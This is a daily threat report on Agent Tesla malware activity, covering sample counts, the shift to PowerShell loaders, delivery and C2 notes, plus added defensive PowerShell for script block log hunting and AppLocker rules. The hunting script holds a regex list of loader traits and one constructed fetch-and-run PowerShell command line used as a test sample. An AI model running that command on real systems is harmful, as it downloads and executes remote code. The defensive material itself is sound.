Agent Tesla - Daily Threat Report

Wednesday, April 29, 2026

Daily Summary

Agent Tesla activity surged today with 74 new samples, a 29% increase over the 7-day average of 58. This is the highest single-day volume in the past week and points to an ongoing campaign push. The rise is driven primarily by PowerShell-based delivery, a shift from the .exe-heavy distribution that is more typical for this family.

New Samples Detected

PowerShell scripts (.ps1) dominate today's collection, accounting for 33 of the 74 samples (45%). Executables (.exe) follow at 15, with JavaScript (.js) at 13 and batch files (.bat) at 6; the remaining five samples fall outside these four types. Compressed archives (.tar) and HTA files appear as minor outliers at 1 each. The weight of script-based loaders suggests attackers are relying on interpreted code that static, signature-based scanning handles poorly, with the .ps1 files most likely acting as droppers that fetch or decode the final Agent Tesla payload.

Distribution Methods

Distribution appears to rely heavily on email phishing campaigns; the feeds do not record the delivery vector, so this is inferred from the file type mix. PowerShell scripts and JavaScript files are common malspam attachments, often disguised as invoices or shipping documents. HTA and VBS loaders are consistent with known Agent Tesla campaigns that use macro-laced documents or embedded scripts. No new C2 servers were identified, which suggests attackers are reusing existing infrastructure.

Detection Rate

Antivirus engines generally detect the traditional .exe variants of Agent Tesla well, but the shift toward script-based loaders (especially .ps1 and .js) is likely to lower initial detection rates. Many environments never enable PowerShell logging, so these loaders can run without leaving a usable record. SOCs should turn on PowerShell script block logging and alert on Event ID 4104 in the Microsoft-Windows-PowerShell/Operational log: that event records the text of each script block as it is compiled, so code unpacked at runtime from an encoded or concatenated string is logged in its decoded form.
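The following is an added example, not code from the report or from abuse.ch: it enables script block logging via the same registry value the "Turn on PowerShell Script Block Logging" policy sets, then hunts the resulting 4104 events for traits that script-based loaders tend to combine. The indicator list, the score threshold and the function names are the author's choices for illustration, not a vendor signature; run it from an elevated session on the host being checked.

```powershell
# Added example (not from the report): enable script block logging and hunt
# Event ID 4104 records for traits common to PowerShell loaders.

function Enable-ScriptBlockLogging {
    # Same value the "Turn on PowerShell Script Block Logging" GPO writes.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    if (-not (Test-Path $key)) { New-Item -Path $key -Force | Out-Null }
    Set-ItemProperty -Path $key -Name EnableScriptBlockLogging -Value 1 -Type DWord
}

# Traits that loaders combine but ordinary admin scripts rarely do. One point per hit.
# This list is the author's choice for illustration, not an exhaustive signature.
$LoaderIndicators = @(
    '(?i)-e(c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}'                 # base64 command line
    '(?i)FromBase64String'                                               # inline base64 decode
    '(?i)\bIEX\b|Invoke-Expression'                                      # eval of built-up text
    '(?i)DownloadString|DownloadFile|Invoke-WebRequest|Net\.WebClient'   # remote fetch
    '(?i)-w(indowstyle)?\s+hidden'                                       # hidden window
    '(?i)-nop\b|-noprofile'                                              # profile bypass
    '(?i)Start-Process.*(AppData|Temp)'                                  # launch from user dir
    '(?i)Add-Type|VirtualAlloc|WriteProcessMemory|CreateThread'          # in-memory loading
    '(?i)\[char\]\s*\d+.*\+.*\[char\]'                                   # char-code strings
    '(?i)bypass'                                                         # -ep bypass / AMSI
)

function Get-LoaderScore {
    param([Parameter(Mandatory)][string]$ScriptText)
    $hits = foreach ($pattern in $LoaderIndicators) {
        if ($ScriptText -match $pattern) { $pattern }
    }
    [pscustomobject]@{ Score = @($hits).Count; Hits = @($hits) }
}

function Find-SuspiciousScriptBlocks {
    param(
        [int]$Threshold = 3,
        [datetime]$Since = (Get-Date).AddDays(-1)
    )
    # 4104 = "Creating Scriptblock text". Long blocks are split into several
    # events (MessageNumber/MessageTotal); each chunk is scored on its own here.
    $events = Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-PowerShell/Operational'
        Id        = 4104
        StartTime = $Since
    } -ErrorAction SilentlyContinue

    foreach ($ev in $events) {
        # EventData layout of 4104:
        # [0]=MessageNumber [1]=MessageTotal [2]=ScriptBlockText [3]=ScriptBlockId [4]=Path
        $text   = [string]$ev.Properties[2].Value
        $result = Get-LoaderScore -ScriptText $text
        if ($result.Score -ge $Threshold) {
            [pscustomobject]@{
                TimeCreated   = $ev.TimeCreated
                ScriptBlockId = $ev.Properties[3].Value
                Path          = $ev.Properties[4].Value
                Score         = $result.Score
                Hits          = ($result.Hits -join '; ')
                Preview       = $text.Substring(0, [Math]::Min(120, $text.Length))
            }
        }
    }
}

# Constructed sample command line (not a sample from the feeds) to exercise the scoring offline:
$sample = 'powershell -nop -w hidden -ep bypass -c "IEX (New-Object Net.WebClient).DownloadString(''http://example.invalid/a.txt'')"'
Get-LoaderScore -ScriptText $sample

# Live hunt over the last 24 hours:
Enable-ScriptBlockLogging
Find-SuspiciousScriptBlocks -Threshold 3 | Sort-Object Score -Descending | Format-Table -AutoSize
```

On the constructed sample the -nop, hidden-window, IEX, DownloadString and bypass indicators fire. Logging only records blocks created after the value is set, so the first live run returns nothing from before that point; also expect noise from management tooling that legitimately uses -EncodedCommand, and tune the threshold or exclude known paths accordingly.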

C2 Infrastructure

No new C2 servers were recorded today. Existing infrastructure remains active, and the absence of new domains or IPs suggests attackers are reusing known endpoints rather than expanding their footprint. Geographic data for C2 hosts was not provided; historically it has included Russian and Eastern European hosting providers. Note that Agent Tesla commonly exfiltrates over SMTP, FTP or the Telegram API rather than a bespoke HTTP C2, so mail or Telegram traffic from an unexpected process is as useful an indicator as the domains and IPs in the feeds.

7-Day Trend

Today's 74 samples are a clear spike above the weekly average of 58, and daily counts have been climbing steadily since April 25. Activity is ramping up, likely tied to a coordinated phishing wave targeting the logistics and finance sectors.

Security Analysis

Agent Tesla's pivot to PowerShell-centric delivery is notable, as it follows the broader trend toward living-off-the-land binaries (LOLBins) to evade detection. This campaign may be reusing obfuscated PowerShell payloads previously seen in QakBot or IcedID operations, which would suggest cross-family tool sharing. Defenders should implement AppLocker or WDAC script rules so that .ps1, .js, .vbs and .bat files cannot run from user-writable directories such as %TEMP% and %APPDATA%; the script rule collection covers exactly the loader file types seen in today's sample mix.
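As an added example (not the report's own guidance and not Microsoft's reference policy), the script below builds an AppLocker Script rule collection in PowerShell that allows scripts only under the Windows and Program Files trees, carves out the user-writable subfolders inside %WINDIR% with explicit deny rules, and applies it in audit mode first. It assumes a Windows edition that supports AppLocker (Enterprise or Server), an elevated session, and the output path `$env:TEMP\applocker-scripts.xml`, which is an arbitrary choice; rule names are the author's.

```powershell
# Added example (not from the report): AppLocker Script rules that confine script
# execution to %WINDIR% and %PROGRAMFILES% and deny user-writable folders under %WINDIR%.

function New-ScriptPathRule {
    param(
        [Parameter(Mandatory)][string]$Name,
        [Parameter(Mandatory)][string]$Path,
        [ValidateSet('Allow', 'Deny')][string]$Action = 'Allow',
        [string]$Sid = 'S-1-1-0'   # Everyone
    )
    # One FilePathRule element in AppLocker's policy XML schema
@"
    <FilePathRule Id="$([guid]::NewGuid())" Name="$Name" Description="" UserOrGroupSid="$Sid" Action="$Action">
      <Conditions>
        <FilePathCondition Path="$Path" />
      </Conditions>
    </FilePathRule>
"@
}

$rules = @(
    New-ScriptPathRule -Name 'Allow scripts in Windows folder'  -Path '%WINDIR%\*'
    New-ScriptPathRule -Name 'Allow scripts in Program Files'   -Path '%PROGRAMFILES%\*'
    New-ScriptPathRule -Name 'Allow Administrators everything'  -Path '*' -Sid 'S-1-5-32-544'
    # %WINDIR% contains folders standard users can write to; Deny rules win over Allow.
    # Temp and Tasks are the usual suspects, but this pair is not an exhaustive list.
    New-ScriptPathRule -Name 'Deny scripts in Windows\Temp'     -Path '%WINDIR%\Temp\*'  -Action Deny
    New-ScriptPathRule -Name 'Deny scripts in Windows\Tasks'    -Path '%WINDIR%\Tasks\*' -Action Deny
)

# Anything not matched by an Allow rule (e.g. %TEMP%, %APPDATA%, Downloads) is denied
# by default once the collection is enforced. Start in AuditOnly to measure impact.
$policyXml = @"
<AppLockerPolicy Version="1">
  <RuleCollection Type="Script" EnforcementMode="AuditOnly">
$($rules -join "`n")
  </RuleCollection>
</AppLockerPolicy>
"@

$policyPath = Join-Path $env:TEMP 'applocker-scripts.xml'   # arbitrary output location
Set-Content -Path $policyPath -Value $policyXml -Encoding UTF8

# Merge into the effective local policy (use a GPO for fleet deployment).
Set-AppLockerPolicy -XmlPolicy $policyPath -Merge

# Rules are evaluated only while the Application Identity service runs.
# AppIDSvc is a protected service on current Windows builds, so use sc.exe, not Set-Service.
sc.exe config appidsvc start= auto | Out-Null
Start-Service -Name AppIDSvc

# Dry-run check against a probe script dropped into the user profile (constructed path):
$probe = Join-Path $env:APPDATA 'invoice.ps1'
Set-Content -Path $probe -Value '# probe'
Get-AppLockerFileInformation -Path $probe | Test-AppLockerPolicy -XmlPolicy $policyPath -User Everyone
Remove-Item -Path $probe
```

The dry run should report the probe as DeniedByDefault. While in AuditOnly, review Event IDs 8006 (would have been blocked) and 8005 (allowed) in the Microsoft-Windows-AppLocker/MSI and Script log to find legitimate scripts that need publisher or hash rules, then switch EnforcementMode to "Enabled". Two caveats: PowerShell 5 and later runs a disallowed .ps1 in Constrained Language mode rather than refusing it outright, which breaks the Add-Type and raw .NET tricks loaders rely on but does not stop simple scripts, so pair this with script block logging; and path rules are only as strong as the ACLs on the allowed trees, which is why the deny rules for writable %WINDIR% subfolders matter.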

Further Reading

Data Sources

MalwareBazaar (abuse.ch)
ThreatFox (abuse.ch)
URLhaus (abuse.ch)
